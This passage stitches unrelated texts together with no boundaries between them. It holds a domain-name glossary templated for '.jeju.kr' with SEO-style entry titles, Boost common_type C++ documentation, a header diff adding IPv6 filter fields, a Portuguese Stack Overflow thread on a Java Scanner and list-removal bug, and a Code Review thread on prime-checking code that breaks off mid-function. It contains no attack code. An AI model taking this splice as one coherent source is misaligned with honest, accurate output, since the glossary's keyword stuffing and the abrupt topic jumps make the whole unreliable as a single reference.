A technology that can be added to the Domain Name System to verify the authenticity of its data. It works by adding verifiable chains of trust to the domain name system.
Domain lock
In order to prevent unwanted changes to their domain names, customers have the ability to set locks on them. Lock availability depends on the individual TLD, and includes clientTransferProhibited, clientUpdateProhibited, clientDeleteProhibited, and clientRenewProhibited.
Domain Name
A unique identifier with a set of properties attached to it so that computers can perform conversions. A typical domain name is "icann.org". Most commonly the property attached is an IP address, like "208.77.188.103", so that computers can convert the domain name into an IP address. However the DNS is used for many other purposes. The domain name may also be a delegation, which transfers responsibility for all sub-domains within that domain to another entity.
Domain name label
A constituent part of a domain name. The labels of domain names are connected by dots. For example, "www.iana.org" contains three labels: "www", "iana" and "org". For internationalized domain names, the labels may be referred to as A-labels and U-labels.
Domain Name Registrar
An entity offering domain name registration services, as an agent between registrants and registries. Usually multiple registrars exist who compete with each other, and are accredited. For most generic top-level domains, domain name registrars are accredited by ICANN.
Domain Name Registry
A registry tasked with managing the contents of a DNS zone, by giving registrations of sub-domains to registrants.
Domain Name Server
A general term for a computer hardware or software server, which answers requests to convert domain names into something else. These can be subdivided into authoritative name servers, which store the database for a particular DNS zone; as well as recursive name servers and caching name servers.
Domain Name System (DNS)
The global hierarchical system of domain names. A globally distributed database contains the information to perform the domain name conversions, and the most central part of that database, known as the root zone, is coordinated by IANA.
Dot or “."
Common way of referring to a specific top-level domain. The dot precedes the top-level domain; for example, the extension is written with a leading dot as “.jeju.kr”.
Expiration date
The expiration date determines when the domain registration period ends. In order to avoid downtime for the domain, renewing it at least two weeks before the expiration date is strongly encouraged. After the expiration date passes, some registries maintain the record of the domain name under the same owner, but DNS services are put on hold.
Extensible Provisioning Protocol (EPP)
A protocol used for electronic communication between a registrar and a registry for provisioning domain names.
Extension
Refers to the last portion of the domain name, located after the dot. The domain extension identifies the registry to which the domain pertains and allows the domain name to be accurately classified.
First Come, First Served (FCFS)
Multiple applications for the same domain name are not accepted. The domain will be awarded to the first registrar who submits a registration request.
FTP
File Transfer Protocol does exactly what it says: this standard network protocol allows the transfer of files from one host to another. There are many FTP clients (programs) available that let you connect to your host and transfer your completed content to your hosting provider's space.
Fully-Qualified Domain Name (FQDN)
A complete domain name including all its components, i.e. "www.icann.org" as opposed to "www".
GAC Principles
A document, formally known as the Principles for the Delegation and Administration of ccTLDs. This document was developed by the ICANN Governmental Advisory Committee and documents a set of principles agreed by governments on how ccTLDs should be delegated and run.
General Availability Phase
Domains are awarded on a first-come, first-served basis, provided the domains are still available after the previous phases have concluded.
Generic top-level domains (gTLDs)
A class of top-level domains that are used for general purposes, where ICANN has a strong role in coordination (as opposed to country-code top-level domains, which are managed locally).
Glue Record
An explicit notation of the IP address of a name server, placed in a zone outside of the zone that would ordinarily contain that information. All name servers are in-bailiwick of the Root Zone, therefore glue records are required for all name servers listed there. Also referred to as just "glue".
Hints File
A file stored in DNS software (i.e. recursive name servers) that tells it where the DNS root servers are located.
Hostname
The name of a computer. Typically the left-most part of a fully-qualified domain name.
Http
HyperText Transfer Protocol serves as the cornerstone protocol of the World Wide Web, allowing the transfer of data between clients and servers.
IANA
See Internet Assigned Numbers Authority.
IANA Considerations
A component of RFCs that refer to any work required by IANA to maintain registries for a specific protocol.
IANA Contract
The contract between ICANN and the US Government that governs how various IANA functions are performed.
IANA Staff
See Internet Assigned Numbers Authority.
ICANN
The Internet Corporation for Assigned Names and Numbers (ICANN) is responsible for the coordination of maintenance and methodology of several databases of unique identifiers related to the namespaces of the Internet, and for ensuring the network's stable and secure operation.
Internal transfer
Internal transfer refers to a transfer of a domain name within the same registrar. This procedure may be simpler than a regular domain transfer, which involves two different registrars. The internal transfer is possible after the two parties involved come to an agreement about the terms of the transfer.
Internationalized domain name (IDN)
An Internet domain name that allows the use of a language-specific script or alphabet, such as Arabic, Cyrillic, or Chinese. Adoption of IDN domain names is a significant step towards including non-English speakers in the world of the Internet. Internationalized domain names are stored in the Domain Name System as ASCII strings, transcribed by the use of Punycode.
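To make the Punycode transcription concrete, here is a small sketch using Python's built-in idna codec; the name "münchen" is just an illustrative example:

```python
# Encode a Unicode (U-label) name into its ASCII-compatible (A-label) form.
u_label = "münchen"
a_label = u_label.encode("idna")
print(a_label)                 # b'xn--mnchen-3ya'

# Decoding the A-label recovers the original Unicode form.
print(a_label.decode("idna"))  # münchen
```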
Internet Architecture Board (IAB)
The oversight body of the IETF, responsible for overall strategic direction of Internet standardization efforts. The IAB works with ICANN on how the IANA protocol parameter registries should be managed. The IAB is an activity of the Internet Society, a non-profit organization.
Internet Assigned Numbers Authority (IANA)
A department of ICANN tasked with providing various Internet coordination functions, primarily those described in a contract between ICANN and the US Government. The functions relate to ensuring globally-unique protocol parameter assignment, including management of the root of the Domain Name System and IP Address Space. ICANN staff within this department is often referred to as "IANA Staff".
Internet Coordination Policy (ICP)
A series of documents created by ICANN between 1999 and 2000 describing management procedures.
Internet Engineering Steering Group (IESG)
The committee of area directors overseeing the IETF's areas of work, which acts as its board of management.
Internet Engineering Task Force (IETF)
The key Internet standardization forum. The standards developed within the IETF are published as RFCs.
Internet Protocol (IP)
The fundamental protocol that is used to transmit information over the Internet. Data transmitted over the Internet is transmitted using the Internet Protocol, usually in conjunction with a more specialized protocol. Computers are uniquely identified on the Internet using an IP Address.
IP address
A unique identifier for a device on the Internet. The identifier is used to accurately route Internet traffic to that device. IP addresses must be unique on the global Internet.
IPv4
Internet Protocol version 4. Refers to the version of Internet protocol that supports 32-bit IP addresses.
IPv6
Internet Protocol version 6. Refers to the version of Internet protocol that supports 128-bit IP addresses.
Landrush Phase
This phase gives you a greater chance to obtain a domain name prior to General Availability, typically for an increased fee. The fee generally varies depending on how early you want to register. Priority is either first-come, first-served, or goes to an auction if there are multiple applicants, depending on registry rules. A common fee structure is the Early Access Program (EAP). Further details on a specific extension's landrush phase can be found under the landrush section for that particular domain.
Mail exchange (mx) record
An MX record determines which server accepts incoming mail for a domain. The MX records for individual domains can be set up in the DNS records section of the client's control panel.
New Generic Top Level Domain (New gTLD)
Starting on July 15th, 2013, ICANN began the process of delegating new Generic Top Level Domains, opening up new opportunities for the Internet community. New extensions include popular categories like professional domains, IDNs, general-interest domains, and brand domain names.
NS record
A type of record in a DNS zone that signifies that part of the zone is delegated to a different set of authoritative name servers.
Parent domain
The domain above a domain in the DNS hierarchy. For all top-level domains, the Root Zone is the parent domain. The Root Zone has no parent domain, as it is at the top of the hierarchy. Opposite of sub-domain.
Parking
Many registrars offer a free domain parking service. This allows the customer to quickly register a domain name and choose a hosting solution at a later date. Very often the registrar's parking DNS servers allow DNS record modification.
Pre-Registration
Paid pre-registration allows you to purchase the domain in the General Availability phase, and the domain will be submitted as soon as the General Availability phase opens.
Primary name server
Practically every domain extension requires a minimum of two DNS servers for the domain to be successfully registered. The primary name server is responsible for storing information about the domain's routing and making it available for requests.
PTR record
The representation of an IP address to domain name mapping in the DNS system.
Recursive Name Server
A domain name server configured to perform DNS lookups on behalf of other computers.
Redelegation
The transfer of a delegation from one entity to another. Most commonly used to refer to the redelegation process used for top-level domains.
Redelegation process
A special type of root zone change where there is a significant change involving the transfer of operations of a top-level domain to a new entity.
Redemption Grace Period
The Redemption Grace Period (RGP) is a period after the expiration date in which the domain still belongs to the same client, but its functionality is put on hold. The domain can usually be restored after paying the RGP fee. gTLDs often have a renewal period of 30 days before the Redemption Grace Period starts.
Regional Internet Registry (RIR)
A registry responsible for allocation of IP address resources within a particular region.
Registrant
See Registrant Contact
Registrant Contact
The majority of registries require four contacts for a successful domain registration: Registrant, Administrative, Technical, and Billing. The Registrant contact is the owner of the domain, and is the entity that holds the right to use the particular domain name.
Registrar for .jeju.kr
An entity that can act on requests from a registrant in making changes in a registry. Usually the registrar is the same entity that operates a registry, although for domain names this role is often split to allow for competition between multiple registrars who offer different levels of support.
Registry South Korea .jeju.kr
The authoritative record of registrations for a particular set of data. Most often used to refer to domain name registry, but all protocol parameters that IANA maintains are also registries.
Registry Operator for .jeju.kr South Korea
The entity that runs a registry.
Reverse IP
A method of translating an IP address into a domain name, so-called as it is the opposite of a typical lookup that converts a domain name to an IP address.
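As a sketch of the mapping, Python's standard ipaddress module can produce the reverse lookup name for an address (the IP shown is the illustrative one used earlier in this glossary):

```python
import ipaddress

# A reverse lookup name reverses the octets under the in-addr.arpa zone
# (ip6.arpa is used for IPv6 addresses).
addr = ipaddress.ip_address("208.77.188.103")
print(addr.reverse_pointer)   # 103.188.77.208.in-addr.arpa
```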
RFCs
A series of Internet engineering documents describing Internet standards, as well as discussion papers, informational memorandums and best practices. Internet standards that are published in an RFC originate from the IETF. The RFC series is published by the RFC Editor.
Root
The highest level of the domain system.
Root Servers
The authoritative name servers for the Root Zone.
Root Zone
The top of the domain name system hierarchy. The root zone contains all of the delegations for top-level domains, as well as the list of root servers, and is managed by IANA.
Root Zone Management (RZM)
The management of the DNS Root Zone by IANA.
RZM Automation
A project to automate many aspects of the Root Zone Management function within IANA. Based on a software tool originally called "eIANA".
Secondary name server
Practically every domain extension requires a minimum of two DNS servers for the domain to be successfully registered. The secondary server is responsible for copying information from the primary server; its original purpose is to take over requests if the primary server is down. Some registries no longer put an emphasis on which server is primary or secondary, but many international registries still use the old standard.
Sponsoring organization
The entity acting as the trustee of a top-level domain on behalf of its designated community.
SSL
Secure Sockets Layer (SSL) is a cryptographic protocol designed to provide communication security over the Internet. Data entered on websites using SSL is encrypted, making it less susceptible to data theft.
Subdomain
In the domain hierarchy, a subdomain is a domain that is part of a larger domain. For example, "www.icann.org" is a sub-domain of "icann.org", and "icann.org" is a sub-domain of "org". Subdomains can generally be set up through a DNS server management utility as A records or CNAME records.
Sunrise Phase
A phase in which holders of eligible trademarks have the opportunity to apply and register domain names that correspond to their trademarks. To participate in Sunrise for new gTLDs, trademark holders must validate their trademarks with the Trademark Clearinghouse (TMCH) first and must provide a valid Signed Mark Data (SMD) file for submission.
Technical Contact
The majority of registries require four contacts for a successful domain registration: Registrant, Administrative, Technical, and Billing. The Technical contact is intended to assist the Registrant (owner) contact with any queries that pertain to the technical aspects of managing the domain name.
Trademark Clearinghouse (TMCH)
The central database of verified trademarks, created by ICANN to provide brand protection to trademark holders during ICANN's new gTLD program. It is a centralized database of verified trademarks that is connected to each and every new Top Level Domain (TLD) that launches.
Top-level domain (TLD)
The highest level of subdivision within the domain name system. These domains, such as ".jeju.kr" and ".uk", are delegated from the DNS Root Zone. They are generally divided into two distinct categories: generic top-level domains and country-code top-level domains.
Transfer
Most commonly, the term transfer refers to an inter-registrar transfer of registrations. The transfer procedure largely depends on the TLD, and is most commonly completed by requesting an authorization code from the current registrar and initiating the transfer at another registrar.
Trust anchor
A known good cryptographic certificate that can be used to validate a chain of trust.
Trust anchor repository (TAR)
Any repository of public keys that can be used as trust anchors for validating chains of trust. See Interim Trust Anchor Repository (ITAR) for one such repository for top-level domain operators using DNSSEC.
Trustee
An entity entrusted with the operations of an Internet resource for the benefit of the wider community. In IANA circles, usually in reference to the sponsoring organization of a top-level domain.
U-label
The Unicode representation of an internationalized domain name, i.e. how it is shown to the end-user. Contrast with A-label.
Unicode
A standard describing a repertoire of characters used to represent most of the world's languages in written form. Unicode is the basis for internationalized domain names.
Uniform resource locator (URL)
A Uniform Resource Locator (URL), commonly known as a web address, is an address of a resource on the Internet. The URL consists of two components: the protocol identifier (e.g. http, https) and the resource name (e.g. icann.org).
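A quick sketch of that split using Python's standard urllib.parse (the URL is illustrative):

```python
from urllib.parse import urlparse

# urlparse separates the protocol identifier (scheme) from the
# resource name (netloc) and the rest of the address.
parts = urlparse("http://icann.org/about")
print(parts.scheme)   # http
print(parts.netloc)   # icann.org
```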
Unsponsored top-level domain
A sub-classification of generic top-level domain where there is no formal community of interest. Unsponsored top-level domains (.COM, .NET, .ORG, etc.) are administered according to the policies and processes established by ICANN.
URL Forwarding
URL Forwarding or URL redirection refers to the most common type of forwarding offered by domain registrars. Forwarding occurs when all pages from one domain are redirected to another domain.
UTF-8
A standard used for transmitting Unicode characters.
Variant
In the context of internationalized domain names, an alternative domain name that can be registered, or that means the same thing, because some of its characters can be written in multiple different ways due to the way the language works. Depending on registry policy, variants may be registered together in one block called a variant bundle. For example, "internationalise" and "internationalize" may be considered variants in English.
Variant bundle
A collection of multiple domain names that are grouped together because some of the characters are considered variants of the others.
Variant table
A type of IDN table that describes the variants for a particular language or script. For example, a variant table may map Simplified Chinese characters to Traditional Chinese characters for the purpose of constructing a variant bundle.
Web host (Hosting Provider)
A web host is a type of Internet service that allows users to host content and/or email services by providing hosting space. Most often, hosting providers include control panels and tools for building a website and maintaining mail records.
WHOIS
A simple plain text-based protocol for looking up registration data within a registry. Typically used for domain name registries and IP address registries to find out who has registered a particular resource. (Usage note: not "Whois" or "whois")
WHOIS database
Used to refer to parts of a registry’s database that are made public using the WHOIS protocol, or via similar mechanisms using other protocols (such as web pages, or IRIS). Most commonly used to refer to a domain name registry’s public database.
WHOIS gateway
An interface, usually a web-based form, that will perform a look-up to a WHOIS server. This allows one to find WHOIS information without needing a specialized computer program that speaks the WHOIS protocol.
WHOIS server
A system running on port number 43 that accepts queries using the WHOIS protocol.
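A minimal client sketch, assuming network access; per RFC 3912 the query is simply the object name terminated by CRLF, and whois.iana.org is used here only as an example server:

```python
import socket

def whois_request(name: str) -> bytes:
    # A WHOIS query is the object name followed by CRLF (RFC 3912).
    return name.encode("ascii") + b"\r\n"

def whois(name: str, server: str = "whois.iana.org", port: int = 43) -> str:
    # Connect to port 43, send the query, and read the reply until EOF.
    with socket.create_connection((server, port), timeout=10) as sock:
        sock.sendall(whois_request(name))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")
```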
Wire format
The format of data when it is transmitted over the Internet (i.e. "over the wire"). For example, an A-label is the wire format of an internationalized domain name; and UTF-8 is a possible wire format of Unicode.
XML
A machine-readable file format for storing structured data. Used to represent web pages (in a subset called HTML) etc. Used by IANA for storing protocol parameter registries.
Zone (DNS Records)
The zone file, also known as the DNS records, is a vital component of the DNS system; it contains the various DNS records that point to the location of content and email servers for each individual domain. Editing the zone is made possible in the client's control panel.
Signed Mark Data (SMD)
A Signed Mark Data (SMD) file allows you to register domain names during the sunrise period of new gTLDs and to request other services. It validates that your trademark has been verified within the Trademark Clearinghouse (TMCH).
Trademark Claims
The trademark claims period extends for 90 days after the close of the Sunrise period. During the Claims period, anyone attempting to register a domain name matching a trademark recorded in the Trademark Clearinghouse will receive a notification displaying the relevant mark information. If the notified party goes ahead and registers the domain name, the Trademark Clearinghouse will send a notice to trademark holders with matching records in the Clearinghouse, informing them that someone has registered the domain name.
Boost C++ Libraries
common_type
Header: #include <boost/type_traits/common_type.hpp> or #include <boost/type_traits.hpp>
namespace boost {
template <class... T> struct common_type;
template<class... T> using common_type_t = typename common_type<T...>::type; // C++11 and above
}
common_type is a traits class used to deduce a type common to several types, useful as the return type of functions operating on multiple input types, such as in mixed-mode arithmetic.
The nested typedef ::type could be defined as follows:
template <class... T>
struct common_type;
template <class T, class U, class... V>
struct common_type<T, U, V...> {
typedef typename common_type<typename common_type<T, U>::type, V...>::type type;
};
template <>
struct common_type<> {
};
template <class T>
struct common_type<T> {
typedef typename decay<T>::type type;
};
template <class T, class U>
struct common_type<T, U> {
typedef typename decay<
decltype( declval<bool>()?
declval<typename decay<T>::type>():
declval<typename decay<U>::type>() )
>::type type;
};
All parameter types must be complete. This trait is permitted to be specialized by a user if at least one template parameter is a user-defined type. Note: Such specializations are required when only explicit conversions are desired among the common_type arguments.
Note that when the compiler does not support variadic templates (and the macro BOOST_NO_CXX11_VARIADIC_TEMPLATES is defined) then the maximum number of template arguments is 9.
Tutorial
In a nutshell, common_type is a trait that takes 1 or more types, and returns a type which all of the types will convert to. The default definition demands this conversion be implicit. However the trait can be specialized for user-defined types which want to limit their inter-type conversions to explicit, and yet still want to interoperate with the common_type facility.
Example:
template <class T, class U>
complex<typename common_type<T, U>::type>
operator+(complex<T>, complex<U>);
In the above example, "mixed-mode" complex arithmetic is allowed. The return type is described by common_type. For example the resulting type of adding a complex<float> and complex<double> might be a complex<double>.
Here is how someone might produce a variadic comparison function:
template <class ...T>
typename common_type<T...>::type
min(T... t);
This is a very useful and broadly applicable utility.
How to get the common type of types with explicit conversions?
Another choice for the author of the preceding operator could be
template <class T, class U>
typename common_type<complex<T>, complex<U> >::type
operator+(complex<T>, complex<U>);
As the default definition of common_type demands the conversion be implicit, we need to specialize the trait for complex types as follows.
template <class T, class U>
struct common_type<complex<T>, complex<U> > {
typedef complex<typename common_type<T, U>::type> type;
};
How important is the order of the common_type<> template arguments?
The order of the template parameters is important.
common_type<A,B,C>::type is not equivalent to common_type<C,A,B>::type, but to common_type<common_type<A,B>::type, C>::type.
Consider
struct A {};
struct B {};
struct C {
C() {}
C(A const&) {}
C(B const&) {}
C& operator=(C const&) {
return *this;
}
};
The following doesn't compile
typedef boost::common_type<A, B, C>::type ABC; // Does not compile
while
typedef boost::common_type<C, A, B>::type ABC;
compiles.
Thus, as common_type<A,B>::type is undefined, common_type<A,B,C>::type is also undefined.
It is intended that clients who wish for common_type<A, B> to be well defined should define it themselves:
namespace boost
{
template <>
struct common_type<A, B> {typedef C type;};
}
Now this client can ask for common_type<A, B, C> (and get the same answer).
Clients wanting to ask common_type<A, B, C> in any order and get the same result need to add in addition:
namespace boost
{
template <> struct common_type<B, A>
: public common_type<A, B> {};
}
This is needed because the specialization of common_type<A, B> is not used implicitly for common_type<B, A>.
Can the common_type of two types be a third type?
Given the preceding example, one might expect common_type<A,B>::type to be C without any intervention from the user. But the default common_type<> implementation doesn't grant that. It is intended that clients who wish for common_type<A, B> to be well defined should define it themselves:
namespace boost
{
template <>
struct common_type<A, B> {typedef C type;};
template <> struct common_type<B, A>
: public common_type<A, B> {};
}
Now this client can ask for common_type<A, B>.
How does common_type behave with pointers?
Consider
struct C { };
struct B : C { };
struct A : C { };
Shouldn't common_type<A*,B*>::type be C*? I would say yes, but the default implementation will make it ill-formed.
The library could add a specialization for pointers, as
namespace boost
{
template <typename A, typename B>
struct common_type<A*, B*> {
typedef typename common_type<A, B>::type* type;
};
}
But in the absence of a motivating use case, we prefer not to add more than the standard specifies.
Of course the user can always make this specialization.
Can you explain the pros/cons of common_type against Boost.Typeof?
Even if they appear to be close, common_type and typeof have different purposes. You use typeof to get the type of an expression, while you use common_type to set explicitly the type returned of a template function. Both are complementary, and indeed common_type is approximately equivalent to decltype(declval<bool>() ? declval<T>() : declval<U>()).
common_type is also similar to promote_args<class ...T> in boost/math/tools/promotion.hpp, though it is not exactly the same as promote_args either. common_type<T1, T2>::type simply represents the result of some operation on T1 and T2, and defaults to the type obtained by putting T1 and T2 into a conditional statement.
It is meant to be customizable (via specialization) if this default is not appropriate.
Diffstat (limited to 'include/internal/object.h')
-rw-r--r--  include/internal/object.h | 13
1 file changed, 13 insertions(+), 0 deletions(-)
diff --git a/include/internal/object.h b/include/internal/object.h
index ef49590..df002fd 100644
--- a/include/internal/object.h
+++ b/include/internal/object.h
@@ -222,6 +222,19 @@ struct nfct_filter {
 		u_int32_t mask;
 	} l3proto[2][__FILTER_ADDR_MAX];
 
+	/*
+	 * FIXME: For IPv6 filtering, up to 20 IPs/masks (12 BSF lines
+	 * per comparison). I think that it is not worthy to try to support
+	 * more than that for performance reasons. It seems that oprofile
+	 * shows bad numbers for very large BSF code.
+	 */
+	u_int32_t l3proto_elems_ipv6[2];
+	struct {
+#define __FILTER_IPV6_MAX	20
+		u_int32_t addr[4];
+		u_int32_t mask[4];
+	} l3proto_ipv6[2][__FILTER_IPV6_MAX];
+
 	u_int32_t set[1];
 };
I register some books, and then I try to delete one with my case 3, but when I enter case 2 to list them all, it still shows the book that should have been deleted. My case 4 should compare the entered genre String with the genero String of the Livro class in each list entry, but my count always returns ZERO, as if no String matched... My main code and the class follow below.
package application;
import java.util.ArrayList;
import java.util.List;
import java.util.Scanner;
import entities.Livro;
public class Program {

    public static void main(String[] args) {

        Scanner sc = new Scanner(System.in);
        Livro livroLivraria;
        List<Livro> livros = new ArrayList<>();
        int count = 0;

        System.out.println("1 - Cadastrar Livro\n2 - Listar \n3 - Excluir Livro\n4 - Pesquisar Livro pelo gênero\n"
                + "5 - Pesquisar Livro por faixa de preço\n6 - Calcular Total do Acervo\n7 - Sair\n");
        int opcao = sc.nextInt();

        do {
            switch (opcao) {
                case 1:
                    System.out.print("Quantos livros quer cadastrar ? ");
                    int j = sc.nextInt();
                    sc.nextLine();
                    for (int i = 1; i <= j; i++) {
                        System.out.println("LIVRO " + i);
                        System.out.print("Nome: ");
                        String nome = sc.nextLine();
                        System.out.print("Autor: ");
                        String autor = sc.nextLine();
                        System.out.print("Gênero: ");
                        String genero = sc.nextLine();
                        System.out.print("Preço: ");
                        Double preco = sc.nextDouble();
                        sc.nextLine();
                        livroLivraria = new Livro(nome, autor, genero, preco);
                        livros.add(livroLivraria);
                    }
                    break;
                case 2:
                    for (Livro l : livros) {
                        System.out.println(l);
                    }
                    break;
                case 3:
                    System.out.print("Qual nome do livro que deseja excluir ? ");
                    String nome = sc.nextLine();
                    sc.nextLine();
                    for (Livro l : livros) {
                        if (l.getNome().equals(nome)) {
                            livros.remove(l);
                        }
                    }
                    System.out.println("Livro excluído...");
                    break;
                case 4:
                    System.out.print("Qual gênero procura ? ");
                    String genero = sc.nextLine();
                    sc.nextLine();
                    count = 0;
                    for (Livro l : livros) {
                        if (l.getGenero().equals(genero)) {
                            count++;
                        }
                    }
                    System.out.println(count + " livros do gênero " + genero);
                    break;
                case 5:
                    System.out.print("Digite o valor inicial: ");
                    double p1 = sc.nextDouble();
                    System.out.print("Digite o valor final: ");
                    double p2 = sc.nextDouble();
                    count = 0;
                    if (p1 < p2) {
                        for (Livro l : livros) {
                            if (l.getPreco() >= p1 && l.getPreco() <= p2) {
                                count++;
                            }
                        }
                        System.out.println(count + " livros entre os valores R$" + p1 + " e R$" + p2);
                    } else {
                        System.out.println("ERRO: valor inicial maior que valor final...");
                    }
                    break;
                case 6:
                    double t = 0;
                    for (Livro l : livros) {
                        t += l.getPreco();
                    }
                    System.out.println("Valor total dos livros R$" + t);
                    break;
                case 7:
                    break;
                default:
                    System.out.println("Esta opção não existe...");
                    break;
            }
            System.out.println("\n1 - Cadastrar Livro\n2 - Listar \n3 - Excluir Livro\n4 - Pesquisar Livro pelo gênero\n"
                    + "5 - Pesquisar Livro por faixa de preço\n6 - Calcular Total do Acervo\n7 - Sair\n");
            opcao = sc.nextInt();
        } while (opcao != 7);

        sc.close();
}
}
The Livro entity class:
package entities;
public class Livro {
private String nome;
private String autor;
private String genero;
private Double preco;
public Livro(String nome, String autor, String genero, Double preco) {
this.nome = nome;
this.autor = autor;
this.genero = genero;
this.preco = preco;
}
public String getNome() {
return nome;
}
public void setNome(String nome) {
this.nome = nome;
}
public String getAutor() {
return autor;
}
public void setAutor(String autor) {
this.autor = autor;
}
public String getGenero() {
return genero;
}
public void setGenero(String genero) {
this.genero = genero;
}
public Double getPreco() {
return preco;
}
public void setPreco(Double preco) {
this.preco = preco;
}
@Override
public String toString() {
return "Livro [ Nome = " + nome + ", Autor = " + autor + ", Genero = " + genero + ", Preço = " + preco + " ]";
}
}
How can I solve this?
What happens is that in your case 3, in this snippet:
System.out.print("Qual nome do livro que deseja excluir ? ");
String nome = sc.nextLine();
sc.nextLine();
You call sc.nextLine() to read the String nome, and then you throw input away by calling sc.nextLine() again. In fact, the first sc.nextLine() only consumes the newline left in the buffer by the previous sc.nextInt(), so nome receives an empty string and the second call swallows the name you actually typed. Just swapping the two calls makes the problem go away. The same applies to the other cases.
System.out.print("Qual nome do livro que deseja excluir ? ");
sc.nextLine();
String nome = sc.nextLine();
Take some time to study the Scanner class and immutability.
I hope this helps.
• It worked for case 4, but case 3 gives the following error after I type the name of the book I want to delete: Qual nome do livro que deseja excluir ? HP2 Exception in thread "main" java.util.ConcurrentModificationException at java.base/java.util.ArrayList$Itr.checkForComodification(ArrayList.java:1042) at java.base/java.util.ArrayList$Itr.next(ArrayList.java:996) at application.Program.main(Program.java:54) – Guilherme Leandro, May 1 '19 at 17:10
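A minimal sketch of the fix for that exception: calling livros.remove(l) inside a for-each loop modifies the list while its iterator is active, which is exactly what ConcurrentModificationException guards against. Collection.removeIf (Java 8+) does the traversal and removal safely; the list contents below are placeholders:

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

public class RemoveDemo {
    public static void main(String[] args) {
        List<String> nomes = new ArrayList<>(Arrays.asList("HP1", "HP2", "HP3"));

        // Calling nomes.remove(...) inside "for (String n : nomes)" would throw
        // ConcurrentModificationException; removeIf removes matches in one safe pass.
        nomes.removeIf(n -> n.equals("HP2"));

        System.out.println(nomes); // prints [HP1, HP3]
    }
}
```

Applied to the question's code, case 3 would become `livros.removeIf(l -> l.getNome().equals(nome));` instead of the for-each loop.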
I recently answered a question on Mathematics Stack Exchange, where I used a small Python program to check the following:
For all 6-digit numbers, with all digits being different, choosing the digits one by one from left to right, the second last digit can always be chosen so that the number will never be a prime.
In a nutshell, I go through all the hundreds and, for each ten, check whether it contains at least one prime number. If this is true for all the tens in the hundred, I then check whether the all-digits-different rule has been violated.
There is no complicated algorithm involved, but I am looking for an elegant and fast way to do this.
Here is the code:
# -*- encoding: utf-8 -*-
from math import sqrt
from collections import defaultdict
def is_prime(n):
"""checks primality of n"""
if n == 2:
return True
if n % 2 == 0 or n <= 1:
return False
sqr = int(sqrt(n)) + 1
for divisor in xrange(3, sqr, 2):
if n % divisor == 0:
return False
return True
def has_primes(n):
"""checks if there are any primes in [n, n+9]
with the last digit different from the others"""
m = n / 10
l = [int(i) for i in str(m)]
for i in xrange(n + 1, n + 10, 2):
if (i % 10 not in l) and is_prime(i):
return True
return False
if __name__ == '__main__':
s = 100000
e = 1000000
res = list()
for h in xrange(s, e, 100): # hundreds
for t in xrange(h, h + 100, 10): # tens
if not has_primes(t):
break
else: # every ten has at least one prime
l = [int(i) for i in str(h / 100)]
d = defaultdict(int)
for i in l: # counting occurrences of each digit
d[i] += 1
print h
for i in d:
if d[i] > 1:
print '>', i
break
else:
res.append(h)
print '\nres :'
for n in res:
print n
I'd like to know how I could improve it. I'm particularly unsatisfied with my testing for duplicate digits; it could maybe iterate only over the numbers with all-different digits, but I don't know how to implement that efficiently.
If you have any other suggestions, they're very welcome. Thank you.
• Your question seems interesting. Would you be able to tell us a bit more about the expected output and some explanation? – SylvainD, Jul 11 '16 at 12:37
• Sure! About which part do you need more explanations? The output will be a list of numbers that satisfy the property, that is to say all the digits until the hundreds are different, and each ten of this hundred has a prime. The goal is to figure out if there can be a winning strategy to the game described in the linked question. – BusyAnt, Jul 11 '16 at 12:40
• I'm confused by this part of your question: "the second last digit can always be chosen". Is it the case that there is some (one) specific 2nd to last digit that we can use that will lead to all 6 digit numbers with all digits different being non-prime? Then why use the word "always"? (Jul 11 '16 at 19:06)
• @BradThomas "always" was employed because the player needs a winning strategy, therefore they must "always"/"in all cases" be able to choose a number that leads to them winning. Perhaps it is more clear in the original question that I linked. – BusyAnt, Jul 11 '16 at 19:23
You can use itertools.permutations() to generate your sequences of unique digits. Also consider using itertools.groupby() to organize things nicely.
So first you can create all your non-dup-digit numbers as strings:
nodups = [''.join(s) for s in permutations('1234567890', 6)]
As Josay mentioned in a comment, '0123456789' can also be expressed as string.digits in python.
And Daerdemandt reminds us to remove numbers starting with 0. For efficiency's sake, let's just construct a generator instead of a list.
nodups = (''.join(s) for s in permutations('1234567890', 6) if s[0] != '0')
Now if you were to call the list() constructor on this you'd get something like:
['123456', '123457', '123458', '123459', '123450', '123465', '123467', '123468', '123469', '123460'...]
Then you need to organize by hundreds digits, more specifically everything except the last 2 digits ([:-2]):
hundo = groupby(nodups, lambda n: n[:-2])
Now hundo contains some nested generators so it might be hard to inspect on the surface, but if you unpacked everything inside you'd find something like this:
{'1235':
['123546',
'123547',
'123548',
...
],
'1234': ['123456',
'123457',
'123458',
...
]
...
}
Then organize each hundred-digit-group further by the tens digit, more specifically the second-to-last digit ([-2]):
hundreds = {h:{t:v for t,v in groupby(ns,lambda n: n[-2])} for h,ns in hundo}
That line is a bit of a mouthful, imagine the variables as
h -> hundreds group
t -> tens group
v -> the values in the tens group
ns -> the values in the hundreds group
You can kind of read it like "make a dictionary that maps each hundreds group to (a dictionary mapping each tens group in that hundreds group to the values in that tens group)."
Now they're organized to test in a structured way. Your check is, if I'm not misreading the problem statement:
all hundreds groups contain any (some) tens group with all not-primes
Or, in python:
all(
any(
all(not is_prime(int(n)) for n in ns)
for ns in tens.values()
)
for tens in hundreds.values()
)
If you want to log the counterexample, you could define a memoized_is_prime() function and use a global variable:
counter_example = None
def memoized_is_prime(n):
global counter_example
counter_example = n
return is_prime(n)
You'd just have to access the counter_example variable afterwards if your check returns False.
Although note that the global keyword is not strictly necessary here, and using global-style patterns is discouraged in general. It is fine in this tiny program, but if you were to extend this code in any way you'd probably want to encapsulate your memoization.
I haven't tested this, feel free to try it out and let me know if you have any questions.
• Nice answer. You could use string.digits instead of the manual definition. – SylvainD, Jul 11 '16 at 13:07
• Wow that's clever, I didn't even know about that. (Jul 11 '16 at 13:09)
• Be sure to drop numbers starting with 0s though. (Jul 11 '16 at 14:18)
• @Daerdemandt: Confirmed and added. (Jul 11 '16 at 14:30)
Factorising each number seems a bit wasteful. You could simply pre-generate the set of all 6-digit primes.
Including less-than-6-digit primes would not spoil things, would make the implementation a bit easier, and the set could then be called just primes.
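As a sketch of that pre-generation step (the function name primes_below is mine, and this uses Python 3 semantics rather than the question's Python 2), a Sieve of Eratosthenes builds the whole set in one pass:

```python
def primes_below(limit):
    """Sieve of Eratosthenes: return the set of all primes strictly below limit."""
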